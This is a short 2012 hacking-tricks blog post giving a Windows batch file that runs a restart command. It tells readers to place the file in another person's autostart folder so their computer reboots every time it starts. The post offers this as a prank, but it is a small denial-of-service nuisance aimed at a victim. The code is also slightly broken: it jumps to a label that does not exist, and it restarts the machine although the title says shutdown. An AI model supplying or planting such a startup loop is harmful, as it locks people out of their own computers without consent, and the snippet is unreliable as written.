Related Posts Plugin for WordPress, Blogger...

Saturday 14 April 2012

Shutdown the computer when it starts

Blows up - Click image to download.


Paste the below code in notepad and save it as anything.bat

@echo off


cls
start shutdown -r

cls
goto :a

Then just put the file in autostart (which can be fond in the start menu)

So whenever the person starts up the computer, it is shutdown again.

0 comments:

Post a Comment

 
Zhacks